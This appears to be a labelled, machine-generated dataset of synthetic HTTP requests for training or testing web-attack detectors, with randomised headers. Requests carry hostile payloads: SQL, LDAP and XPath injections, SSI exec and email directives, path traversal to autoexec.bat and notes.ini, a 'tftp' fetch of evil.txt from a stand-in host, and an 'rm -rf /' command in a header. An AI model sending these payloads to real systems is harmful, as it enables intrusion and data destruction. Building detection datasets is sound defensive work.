Pragma: no-cache
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: ettity hOti=5AIs
Range: 6-02287,72753-
Referer: http://www.oeaeisc.cz/tmytu6/omuf/lleaimtt.exe
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: sydaeuonbn (u2fug.o; sLu39N; aOmLjOd; rUUXlHx; aHWNWT0C8_)
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: FTP/9.2 224.36.42.28
Transfer-Encoding: gzip
Upgrade: arpaj/4.2, l8tsI/0.9, 9dev/6.0, m7u/6.0, sin/4.9
Warning: 500 103.24.153.176 "urwer2tml4" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44464
Start - Id: 35861
class: XPathInjection
GET /6enYi/unionfG/7soareeenlmxip/7okw2yjh@T6.js?7hqz7huaXgg=h2pre7e7&HVhkPnodePprocessing-instructionz=blbr&MNHroTR8zR=Miconnect&Gl7Y=9++or++1%3C++++l%2Fbjo%2Ftuhil%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D++or+++893%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&sctSu=iwR HTTP/1.1
Host: 62.254.147.122
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.6, compress, identity, identity;q=0.6, gzip;q=0.0
Accept-Language: eIe1my-sttzin;q=0.5, mzrteu-btienqs;q=0.1
Cache-Control: no-transform
Client-ip: 155.41.173.240
Cookie: vuwindow.openf76D8=2r9dPE2TSaia;ZeKlikeChtacces=44747;oGiRyZ=4367399;hronsadwq=7;IJIDsam2=iVoeNY
Cookie2: $Version="9"
Date: Sat, 23 Apr 05 07:21:01 CET
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: 100-continue
From: alcSeiee@shniectns.be
If-Modified-Since: Sat, 03 Jan 09 22:26:15 UTC
If-Unmodified-Since: Fri, 23 Apr 04 24:39:01 UTC
If-Match: "75ogcdEg1tIwP2ZdWlK7"
If-None-Match: *
If-Range: "xSRlx4K0Vf@PBz_L"
Max-Forwards: 044
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic MGFnc01zaWk6cDlzaW4=
Authorization: Digest response="Ee064f23f7eeAbcACf76feafAa1dfbd0"
Range: -15
Referer: /1xemips.css
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/0.4 (X11; U; Solaris 1.9; 9o-ul; rv:8.2.1) Gecko/16417417
UA-CPU: Sparc
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0823x5331
Via: 7.1 www.vsirMnoE.png, 8.2 www.w11e.png
Transfer-Encoding: compress
Upgrade: ei2y/3.0
Warning: 278 124.130.70.150 "dewioT68Dmdytekib4" "Tue, 23 Nov 04 10:02:15 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35861
Start - Id: 37160
class: LdapInjection
GET /ed5gteu.jpeg?b0lnie5=e_0mb0B8cF&ddldu=2&iulkuisRll=mwiyNJJdnlX&eatiecf4=yteteerua4&iikd=80&te=8923434676&toamt5awV=E3n&hn=rEGXVusnTs&orerwmhS=ryIbhypMI5b&divkHtW3KUR@w0=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 223.45.89.123
Connection: tn6krih
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 188.238.110.194
Cookie: Nmeoori3sr=oindp7t
Cookie2: $Version="45"
Date: Wed, 19 Dec 07 09:52:00 GMT
ETag: W/"HoRX_mVFjHifoQib"
Expect: 100-continue
From: tshrlW@hlaga0aBB1.de
If-Modified-Since: Tue, 13 Mar 07 03:02:16 UTC
If-Unmodified-Since: Sun, 30 Nov 08 09:27:43 CET
If-Match: "Chs6hK0pEcHkTjNSW"
If-None-Match: "vYThNU@fmW8EKJg"
If-Range: *
Max-Forwards: 2155
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic YXBvczpza05p
Range: 183458-,10781-99705
Referer: /tin5oOo.exe
TE: trailers
Trailer: Connection
User-Agent: Mozilla/0.0 (compatible; 6st8wohioS; Win98; aonetpah; wc7gda)
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5776x2501
Via: 2.2 227.81.158.63, FTP/7.8 207.41.48.39:603, HTTP/5.6 174.36.26.210
Transfer-Encoding: ousS5e; dIqr=hNettta
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 57194
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37160
Start - Id: 38554
class: LdapInjection
GET /4omceeIomns/tPZa/oj8seita2eoaoo/is4uto1htot/4ixnlxoeuen/t1zhro/r1toaieu.js?mdRtsugaomCeqoW=x0C&toesc=21hamdlcs5b9weR4&wgtnoogI3=usrrghtnme%3Blaatq&4dseiol8e=540&tnhiIl3efcngatm=passthrucopyic%5CotTee1eustdincrs%7C%3Fn&NttatrtTdewe=pleauhen&ooernSgri6=eih+i&ndezrveeel=inull&tu8td8iEbnoytib=1&wt=derfnEhhy&sw5ztona7o=f%26%3Ftoh%3Coo&t6=3&7su8aw=sfrom%3Fsf%3Fbctdmhomehome&h6HmT8=%29+%28++++%7C%28displayName%3Dhad*%29++++%28name++++%3Dhad*+++%29%28++mail%3Dhad*%29 HTTP/1.1
Host: www.aldSbOE.gov
Connection: nMouh
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.7, koi8, x-mac-chinesetrad, x-mac-japanese;q=0.4, x-mac-turkish;q=0.0
Accept-Encoding: compress;q=0.4
Accept-Language: *;q=0.9
Cache-Control: max-age=092
Client-ip: 40.99.33.206
Cookie: LiRmckNfromz=59723972;seeoiaod8eio=60;nMat=21
Cookie2: $Version="4"
Date: Tue, 11 Jul 06 02:19:01 GMT
ETag: W/"Mx20H@ckCBRko3Mhzz"
Expect: elny
From: zttnih@4elXnnltkb.org
If-Modified-Since: Wed, 28 Feb 07 13:13:47 UTC
If-Unmodified-Since: Thu, 19 Jun 08 15:18:15 CET
If-Match: "i-3uQdIjYX_@OZpvIJP"
If-None-Match: *
If-Range: Sun, 10 Jan 10 22:54:29 GMT
Max-Forwards: 6481
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: NTLM eGh3aFRJZDJpdWE5dW1yc29lYW9zbzVoTm94SU5uU2hieWRhZGFuZQ==
Range: 0-592893,7-227,398-
Referer: /rUinOreo.asmx
TE: gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.7 (Windows; U; WinNT 6.8; be-ut; rv:0.4.1) Gecko/72461099
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: FTP/4.2 117.2.41.195, 2.2 74.104.235.99, FTP/3.0 221.114.205.240
Transfer-Encoding: uds5Fy; yiecat2=LavaT7a
Upgrade: AwoFtN/5.6, vmGs2/6.3, lsee/0.5, mxjple/8.1
Warning: 257 www.nege.css "tabeoWaOoehrErrknae" "Fri, 05 Jun 09 24:03:11 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38554
Start - Id: 35652
class: XPathInjection
GET /8KorzI9ESoaccess_logOGV/ab/tDi2elfZkvX-lPp3Tu/nLtdn/hpD11i_ezCC/1rkRq.GvySrA@h/khanpemtIonrn/cI2S0JQ4d/uy8svHs76GLrsr7rXXK.tiff?71zynd9qbE=linketetc&fnstfr9C=i%401x7ZPuQ&shWhrnape=xHvs&rnbnatbtreEal=643776819&nfx2eerttgesWn=mo7%3Fef3T&ug7n2kirdl3RsAo=she6rterSwhereofeii&wkier0idn1Cw=pDboot.inireloiorluusrlinkr+l+oB&mrsjye0eivs=%7Eu&bstroene=u&Iiie0sncooue=34759&ygntgedZqih=0963263801&jo5e0myrslcoSo=u%3Dpositioncnodemna&ei=byh5%27+or+%28i++%3C+++count%28aacsa%2Fchild%3A%3Atext%28%29%29++and+j+++%3C++++count%28oslloe%2Fchild%3A%3Acomment%28%29%29++++and++++k++++%3C+++++count%28eyv%2Fchild%3A%3A*%29+++%29+++or++%27tic%27+++%3D%27+couznxt%27++++or HTTP/1.1
Host: 44.47.136.69
Connection: eiigddi
Accept: */*;q=0.6
Accept-Charset: hz-gb-2312;q=0.9, windows-1251;q=0.4, x-mac-hebrew, windows-1255
Accept-Encoding: gzip, identity;q=0.1, deflate, deflate
Accept-Language: neeot7hC-ce;q=0.4
Cache-Control: min-fresh=5
Client-ip: 85.216.49.129
Cookie: hV1inri=:ur;4enmNei=oohFdt;H1XlibU8Pg=3347
Cookie2: $Version="053"
Date: Tue, 28 Aug 07 16:36:21 GMT
ETag: W/"at_C70DiSTs.hfC"
Expect: ye2S
From: 8oiisi@uknxnhisdr.org
If-Modified-Since: Sat, 08 Sep 07 14:27:36 GMT
If-Unmodified-Since: Fri, 19 Mar 10 18:02:26 UTC
If-Match: *
If-None-Match: "V0nskmoKB7WYItaH1@e"
If-Range: Sun, 11 Feb 07 02:39:26 CET
Max-Forwards: 6
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: NTLM YzZrYmVzeXJjaU5uZXljczFGcHJjN2Vlcm80anJhaGlmdGU3d2dzaQ==
Range: -38,162-85,-031
Referer: /rses.nsf
TE: gzip;q=0.3,chunked
Trailer: Range
User-Agent: ru3ctn3aq7 (ju7DIS; tvy3WW9Dg2)
UA-CPU: StrongARM
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3327x2128
Via: FTP/5.6 177.200.131.82:261, 3.3 www.snttn.jpg, HTTP/4.9 248.15.226.204
Transfer-Encoding: ropcH; iTam3eua=koe0ro
Upgrade: zizt/1.0, Nfsr/7.3, araJv/5.9, 0athyr/9.5, 7a2ey/9.9
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 9747150150274
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35652
Start - Id: 42556
class: SqlInjection
GET /rCfb9XhiA3i.aspx?havingRwnph-x@gvJPM4=hs&2bgnotI=%27+UNION+++++++ALL+++++SELECT++++vedy3nl++FROM+++++nes+++++WHERE+++%27%27+++%3D+%27&imok=+i-in0im59t6otd&lq5TTimg_hxmM.=oUIs&wt=231446487&gt3mtcnbiSanO=nKJw9rN7c&bOoti=9653090&y7T4iEalYrhi=a7iGt01aGm&wrHT=3ts98rueots&c5fe=2wNVD66&nsa=9166 HTTP/1.1
Host: www.tn84tt.uk
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, gzip, identity, gzip, compress;q=0.4
Accept-Language: neantlC-w;q=0.2, ohrc-s, ca-tjUs
Cache-Control: no-store
Client-ip: 29.213.12.81
Cookie: QotiEaOctra9dm=eZisZOD91FKC;H7u9oshensttn7=?t;qemo1toeont=23479614;6eterE=552
Cookie2: $Version="597"
Date: Sun, 18 Apr 10 13:54:41 CET
ETag: W/"Kz4lucxZCwp.GwKmCHYS"
Expect: 100-continue
From: aeaaa@xlGenlm.fr
If-Modified-Since: Sat, 25 Aug 07 14:03:08 CET
If-Unmodified-Since: Fri, 24 Dec 04 18:24:18 CET
If-Match: *
If-None-Match: "6IPpT@3QrIl@MP-pxA"
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 9
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM d2hqMm5mc21qbm82NG15c25jaTB6YW9lbHR5Z2g5dGVsbXRhZXNhNlg3YTQ=
Range: -9299
Referer: http://lofosh.it/k7rtd/s1naare/vheaSy6v.asmx
TE: gzip
Trailer: Expect
User-Agent: tbgned http://www.eprs4.org
UA-CPU: 68000
UA-Disp: 962,664,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: HTTP/2.0 www.Asabt.gif, 4.9 www.rahat.png
Transfer-Encoding: compress
Upgrade: oui/8.3, tn8/9.7
Warning: 932 195.72.254.121:53 "lnpgreue" "Fri, 16 Oct 09 14:01:22 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42556
Start - Id: 40177
class: SSI
GET /i9Pdr/UPwKjlibperlekdropp.php?rehi76ionh=020334&lfhIan6dte=39733&isC6r0tilotc49=hofGvEK2&ismcwrAe=s0&Toio=83&aOdOtqit=641834&9JpjbBTu=nuoh5yxdonl&qinra=h&MoN=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fls++++-l++%2Fhome%2FpTR5eu%2Fhiil%22++++--%3E&t9qYLx=te&KQUM_YnO_lE=he&uenan9saglso=tsv&dPste=cwp-m HTTP/1.0
Host: www.vtftes.de
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-6;q=0.6, x-mac-roman;q=0.5, x-mac-arabic;q=0.2, shift_jis, windows-1257
Accept-Encoding: *;q=0.9
Accept-Language: reEi0rs-i0;q=0.9, a-sepfgis, syia6XhT-r8n
Cache-Control: no-cache
Client-ip: 34.79.0.86
Cookie: hizymunegt=0ooc;nfnrfnte6in=ec o+sn;j4TreplaceZac=wcfoeanoststet;nr=9NoorLyieiede626n
Cookie2: $Version="84"
Date: Thu, 24 Mar 05 10:56:08 UTC
ETag: "Wlv33KefxTo2553"
Expect: 100-continue
From: 1unwdb@arcbteiHd.biz
If-Modified-Since: Wed, 18 Jan 06 15:54:55 CET
If-Unmodified-Since: Wed, 01 Apr 09 15:43:32 CET
If-Match: *
If-None-Match: *
If-Range: "z4J7VHohIk5@gnw3OaI_"
Max-Forwards: 6
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic cGNuY3Njczplbm9ybTQ=
Authorization: Basic bnl3ZGFzOk1pMnNz
Range: 0-
Referer: http://etdsaw.gov/lbhmysta/aeaehbds/oltj.msf
TE: deflate;q=0.5,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/6.9 (X11; U; Open BSD i586 4.8; ee-R7; rv:8.9.1) Gecko/34454053
UA-CPU: StrongARM
UA-Disp: 6994,159,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8851x316
Via: FTP/3.4 www.tydtChOt.html
Transfer-Encoding: omdu; etnup=hqae4
Upgrade: moke/1.6, hxef/0.0, hp0ky/1.9, nstdo/7.4, smon/0.7
Warning: 617 www.aa0efg.png "i7eeeyweupihp0u" 
X-Forwarded-For: 134.80.112.39
X-Serial-Number: 06191135820
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40177
Start - Id: 37252
class: LdapInjection
GET /kvEv2/bJ8cG4p9/bRRkKwzYfN8Ipl/ei@j6c.38pucVT8lUUT/ech9/otydidnoe/hPb8PZizHo7l5Rm--/emoAhKwsRE-.dll?kuraee8ae3rwrp=+ifcaI0%3C&tg3paharS=ese%29%28++++%7C+++%28hr%3D*%29 HTTP/1.0
Host: www.lasiehtePo.biz
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 112.64.200.186
Cookie: iteurchmv=oe3;mmeotsbuces=or\4rwnwet
Cookie2: $Version="9"
Date: Sun, 14 Jun 09 12:54:17 UTC
ETag: "MbmMz1FWl6kuWRkv"
Expect: 100-continue
From: tlclo@pOIec.be
If-Modified-Since: Thu, 05 Mar 09 24:37:21 UTC
If-Match: *
If-None-Match: "1y5S9ElnJXoorOnIe"
If-Range: "EHVwY9P2r3_JfWszoY.t"
Max-Forwards: 5270
Pragma: Lstioa=go4tmmnc
Proxy-Authorization: Basic c2U1ZlE6Z3RhYWp0bXQ=
Authorization: NTLM bmVyb250OTFwZndza210b3duc2hwZGNtdHh3MnJoeHRlcw==
Referer: /yomsstaE.aspx
TE: trailers,gzip;q=0.3,deflate
Trailer: Warning
User-Agent: c2aahe (gWu9SUs; a95kW9n; 2ZTW_.n0Pq; uh4uaaAqtw; tjb2B_7FA)
UA-CPU: 68000
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: iaod/1.9 www.albtAee.gif
Transfer-Encoding: compress
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37252
Start - Id: 44570
class: OsCommanding
PUT /i8K.tiff? HTTP/1.1
Content-Length: 120
Content-Language: l
Content-Encoding: deflate
Content-Location: http://www.dizuYlf5.gov/3eix/8hnin/tEdh/hlefoe/a9cer.shtml
Content-MD5: ZXNzczhlNGVlaEJhbzNlYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Aug 09 08:59:32 UTC
Last-Modified: Tue, 02 Dec 08 23:28:17 UTC
Host: 37.143.226.104
Connection: hrSwP9
Accept: */*
Accept-Charset: x-mac-hebrew, iso-8859-9, x-mac-cyrillic, iso-8859-9;q=0.0
Accept-Encoding: 
Accept-Language: m9indt-oan, hvi-eiR;q=0.1, titEeL-nwercqi;q=0.4
Cache-Control: max-age=022
Client-ip: 145.157.177.78
Cookie: ritAeeDSxouanR=Op>hfiHl h
Date: Wed, 18 Feb 04 07:18:27 GMT
ETag: "Pdu5B-rYB0AW_8GO"
Expect: uwsaltSm=5myteE;eo7otdz=thwSy7x0
If-Modified-Since: Thu, 20 Mar 08 07:33:29 UTC
If-Unmodified-Since: Wed, 06 May 09 12:33:04 GMT
If-Match: "gTPoAHpVZezeUIwt8"
If-None-Match: *
Max-Forwards: 78
MIME-Version: 1.5
Pragma: naisj='h'
Proxy-Authorization: rnerea 2nhwteS=toea
Authorization: NTLM N29nZmFhaDV5eWRSZWx0ZW9Fczl0YWFpYXpyQWVkWWhvaHE3RWhpb3Nv
Referer: /resued/slwkuo/sm5grr.php3
TE: gzip;q=0.4
User-Agent: Mozilla/9.3 (X11; U; SunOS sun4u 8.2; rt-n4; rv:3.1.8) Gecko/27845504
UA-OS: Win95
Via: FTP/5.6 178.17.91.193, HTTP/6.1 184.42.102.206, 9.3 www.mceleeS.htm
Transfer-Encoding: compress
X-Forwarded-For: 21.178.56.88
----: --------------------------------

1Aaojmmto=92193&T39nuntigoTda=193.187.10.82 |    tftp 192.168.10.33 evil.txt&f6y1J@objectl=[  oh&awhere4r-5=nH7Yj2t8

End - Id: 44570
Start - Id: 36139
class: PathTransversal
GET /LeitonEgoeneyr/ezS_Rf0iEhtgkHhT/nOelr80s8ssnu/t.0iZ/8MsSC/H7/RRo7iiaewcqnaune8se/dh9yuhlYKeanimOsp.css?QGwRjX2=7568184&7tGen1xsreHn=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&muqb6=etrcnorarenetcatwhsb1%5Crt HTTP/1.1
Host: 221.221.107.6
Connection: 651teun
Accept: application/zip, text/html, text/xml
Accept-Charset: euc-cn, utf-7;q=0.8, x-mac-greek, x-mac-japanese;q=0.3
Accept-Encoding: *
Accept-Language: f6Loc-tvtT, sewu-aakeef
Cache-Control: only-if-cached
Client-ip: 25.79.74.161
Cookie: e8mecpe5oqth=m;obattdtw5r=faeh;pRdlt=nat;ta3n=81175052
Cookie2: $Version="150"
Date: Mon, 06 Apr 09 09:18:26 UTC
ETag: "1Th7ACFJdKWcpA5LuNZ"
Expect: dhDtini=ioxsa;rEagrOo7=aec8e
From: Arat@rNst.com
If-Modified-Since: Tue, 22 Jan 08 12:50:20 UTC
If-Unmodified-Since: Wed, 09 May 07 13:55:30 GMT
If-Match: *
If-None-Match: "1@GKwCcl3LZPQvuE@l_"
If-Range: "UPRS7S1r@EAzDEy"
Max-Forwards: 9867
MIME-Version: 1.7
Pragma: wlrN='piioadbi'
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest qop=hiiaf
Range: -52194,2-,7-21979
Referer: /nhiae/3amaio/cze1segS.msf
TE: trailers
Trailer: Accept-Encoding
User-Agent: 0sLItt6 http://www.ir7Eao.biz
UA-CPU: MIPS
UA-Disp: 4342,924,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 795x647
Via: 0.4 248.52.188.119, fn9r/9.7 28.84.245.190, HTTP/1.0 www.ebofel.js
Transfer-Encoding: gzip
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 129.108.57.155
X-Serial-Number: 6486734154619358
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36139
Start - Id: 45106
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: www.onetl.de
Connection: llndk8
Accept: */*;q=0.9
Accept-Charset: koi8-r;q=0.6, windows-1250;q=0.6, x-mac-icelandic;q=0.6, koi8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 154.211.218.131
Cookie: yrfeeeMyzq5fv=60814492;fweeltud=156;KgNobjectDnSmT=nsTtsnijihoi
Cookie2: $Version="1"
Date: Wed, 27 Aug 08 09:22:19 UTC
ETag: W/"Fj-adqaO5kI8kAMZh.@"
Expect: uhxrdEf=ynXs4rl3
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Wed, 24 Mar 10 19:49:09 GMT
If-Unmodified-Since: Sat, 21 May 05 16:37:33 UTC
If-Match: *
If-None-Match: "S@X@VvOparCfNRgbhfT6"
If-Range: Wed, 16 Jun 04 07:09:52 GMT
Max-Forwards: 237
MIME-Version: 4.2
Pragma: se5d='nnfSaPsE'
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: NTLM dHRubm90ZXVlbmtpbG9ibnV0am1oY3JtZW1vOE9hZW5yYWhucnJza25hZzhldGZs
Range: -3,456-488022
Referer: http://www.spCiw.net/veh14zP3/hu217/eiu9/gLfe/u5rlmeej.asmx
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/9.0 (Windows; U; Windows NT 8.8; el-dn; rv:5.3.0) Gecko/92387730
UA-CPU: StrongARM
UA-Disp: 4629,539,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 213x015
Via: 2.0 91.186.196.32
Transfer-Encoding: deflate
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45106
Start - Id: 36679
class: OsCommanding
GET /9Q4ci8OD/iDzx1/tbHVbM@ftca-0/bsOrwptvA/neshnUuilrgaqn/hKjEvEfyw/1coantl/SzJrUYs/aqU2OCkNUFo1Uk/imBVK8@J/ksewajoqAfoaqdsd.cfm?ohrnnron=ShatR&ew0slcas1oliAbr=546388 HTTP/1.1
Host: www.nnrlhua.net:80
Connection: keep-alive
Accept: application/x-tar;q=0.4, image/png, audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: `   rm   -rf  /     `
Client-ip: 50.91.223.189
Cookie: rSytghitgtRl=ecka;raMsthteerdtT=799;ei3nDpAtsgo=uy0aeoacf;didsade=jiebdeyektaShyN
Date: Wed, 20 Jan 10 04:38:44 GMT
Expect: 100-continue
Max-Forwards: 8282
Referer: http://www.teyriHi.gov/oaRedew/2aaj.php
User-Agent: ihOM6z2 (i.HhYGt_a; lRcnCxvAfP)
Via: ned/8.3 171.42.13.26, 3.4 31.84.98.133, 6.3 www.saz8cct.jpg
Transfer-Encoding: gzip
----: -----------------

null

End - Id: 36679
Start - Id: 38878
class: LdapInjection
GET /a7gjWZRWYlUZbxhf/esoqIj/r_eaJIpMe2/odwaDW@NXZA2/tdsuQDcaaHdyEaqtessp.jpeg?taa0uoutt=e-sam1etoains&Ta=nniusrbtc&P8_smy@C=zioWU&dRbwardrtatyh3=hreEyn+urttn&ayttnd=503026&Zcbisv1t=aP09ts2og&sT3hfqt4nt6pa=652%29%28%26%28objectClass%3D1Io%29%28%7C%28sn++%3D++++gad%29%28cn%3Dueee++++J*%29%29&qtleb=itr&homeUWBy5SQW_9L=gadaL0s&FpmD_=3&oeei=580547&m7teos=cR1MKuf.&dae0aci4lses=lAMl4 HTTP/1.0
Host: 215.155.216.132
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr, windows-874;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 206.129.188.199
Cookie: hluNit=sYl;CexecKQbcatZI=5ecemrl;ossb=22;RVGZG7=i8rEnr\;fu8USckbRAR=re(;V_PQ=535818655
Cookie2: $Version="380"
Date: Fri, 08 Oct 04 02:30:42 GMT
ETag: W/"kIaHUCP6c03l.Tt71Mx"
Expect: onveaEc=boIat;tlR2=6o2r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Sun, 13 May 07 11:55:06 UTC
If-Unmodified-Since: Tue, 21 Apr 09 17:39:38 CET
If-Match: "me2C6EiJeYW.QQY.Rk3a"
If-None-Match: *
If-Range: Thu, 13 Sep 07 13:54:42 UTC
Max-Forwards: 3764
MIME-Version: 1.2
Pragma: avqey=srneu
Proxy-Authorization: Basic dGFkZmhzOnR2anRr
Authorization: Basic RXlsb25vZWU6aHJsc3hh
Range: 15934-,799-8058,-81465
Referer: /35eaewrn/rnnt/0Svtph.zip
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.4 (Windows; U; Win 9x 9.7; ni-wg; rv:0.7.0) Gecko/92503817
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 279x383
Via: 7.7 www.smftmxv.tiff, FTP/3.3 223.161.207.227
Transfer-Encoding: gzip
Upgrade: ccso6g/3.3, rnca/7.0, aaeu/2.0, rjeGo/0.6, umim3u/7.7
Warning: 605 205.123.17.49:63776 "cb6tsipI2WEtibtnMi" "Mon, 26 Sep 05 17:29:00 CET"
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 9521103915785136495
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38878
Start - Id: 39435
class: SSI
GET /s1umeeffakstPeS3r/r3_MIl@tqP_-mdx/n4RHUpbU/hjkPrcrgrE@1VETgny0/eiiy/SenEAaakacuOratssa/f17-.jpeg?documentuags=dp&utnJzExW=sfxPzFJe&aceSns8e=%3C%21--%23email+fromhost%3D%22www.tn3xunhn.com%22+tohost%3D%22mailbox.cbanp.com%22+message%3D%22ldEyn+sq1edg+Squ+eln%22+fromaddress%3D%22ny34r.com%22+toaddress%3D%22frcnt.gk.com%22+subject%3D%22g%22+sender%3D%22tkes.com%22+replyto%3D%22medtey.com%22+cc%3D%22udbt%22+inreplyto%3D%22qkw9+nltu+enz%22+id%3D%22esr8Ymail%22+--%3E HTTP/1.1
Host: www.nrodItek.gov
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 166.48.94.150
Cookie: ksZLQo@L0Z7=4e+ie'eeifguilinput4Som;idrdeCp=i;Yitgmhzo=06791502
Cookie2: $Version="308"
Date: Mon, 30 Jul 07 09:30:32 GMT
ETag: "-A3q_0z5h0Y@AJr8"
Expect: 100-continue
From: hziane@Cydgndnsy.org
If-Modified-Since: Thu, 06 Dec 07 10:11:44 CET
If-Unmodified-Since: Sun, 20 Nov 05 16:43:22 UTC
If-Match: *
If-None-Match: "B1F2-8jSm9IP8.gHa"
If-Range: Tue, 27 Mar 07 04:14:38 UTC
Max-Forwards: 2
MIME-Version: 3.5
Pragma: ht=hOmppd
Proxy-Authorization: rashN riiam=cssstki
Authorization: NTLM ZlNuZWUxaGE4cnJuaHBlQXJsZWVpb3RvZlVpNXFlY0VpaWFwbmU=
Range: -07524
Referer: http://dtuoaa.st/feaa.bin
TE: trailers,deflate,chunked
Trailer: Authorization
User-Agent: Mozilla/8.5 (Windows; U; Windows NT 0.5; Ib-md; rv:1.3.7) Gecko/74486505
UA-CPU: PowerPC
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 162x589
Via: FTP/9.1 www.4ykolude.tiff, 5.4 232.23.58.68, 9.0 www.Betip.shtml
Transfer-Encoding: deflate
Upgrade: r94e/0.1, hme/5.5, ammrcS/1.0, aznO/2.8
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
